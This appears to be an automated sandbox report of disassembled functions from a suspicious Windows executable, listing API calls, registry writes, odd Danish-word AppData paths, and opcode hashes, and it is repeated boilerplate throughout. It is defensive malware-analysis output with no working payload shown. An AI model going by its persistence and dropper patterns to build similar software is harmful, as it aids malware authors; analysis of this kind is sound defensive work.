C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet, xrefs: 004017C3
%Konstituerende176%\presatisfaction, xrefs: 004017B2, 004017BB, 004017DA, 004017E6, 0040181C, 00401832, 00401850, 0040188C, 0040190D, 00401916, 00401920, 0040192B

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: %Konstituerende176%\presatisfaction$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet$eksegeternes$lftninger\slangetmmerens
API String ID: 1941528284-3704169145
Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
SetWindowTextW.USER32(matrices,matrices), ref: 00405633
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

matrices, xrefs: 004055E7, 004055F7, 004055FD, 00405620, 0040562C

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: matrices
API String ID: 2531174081-3449136062
Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040333A
GetTickCount.KERNEL32 ref: 004033BB
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033E8
wsprintfW.USER32 ref: 004033FB

Strings

... %d%%, xrefs: 004033F5

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
wsprintfW.USER32 ref: 00406917
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Strings

%s%S.dll, xrefs: 00406911
UXTHEME, xrefs: 004068CE

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(lftninger\slangetmmerens,00000023,00000011,00000002), ref: 004024FA
RegSetValueExW.KERNELBASE(?,?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Strings

lftninger\slangetmmerens, xrefs: 004024EB, 004024F9, 00402510, 00402524, 0040252F

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: lftninger\slangetmmerens
API String ID: 2655323295-458217052
Opcode ID: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
Opcode Fuzzy Hash: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668

Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040607E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099

Strings

nsa, xrefs: 0040606D
C:\Users\user\AppData\Local\Temp\, xrefs: 00406065

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F

Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet,?,00000000,000000F0), ref: 00401672

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet, xrefs: 00401665

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet
API String ID: 1892508949-3795260011
Opcode ID: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
Opcode Fuzzy Hash: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
RegCloseKey.ADVAPI32(?), ref: 00406460

Strings

: Completed, xrefs: 00406416

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94

Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45

Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45

Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45

Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45

Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45

Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
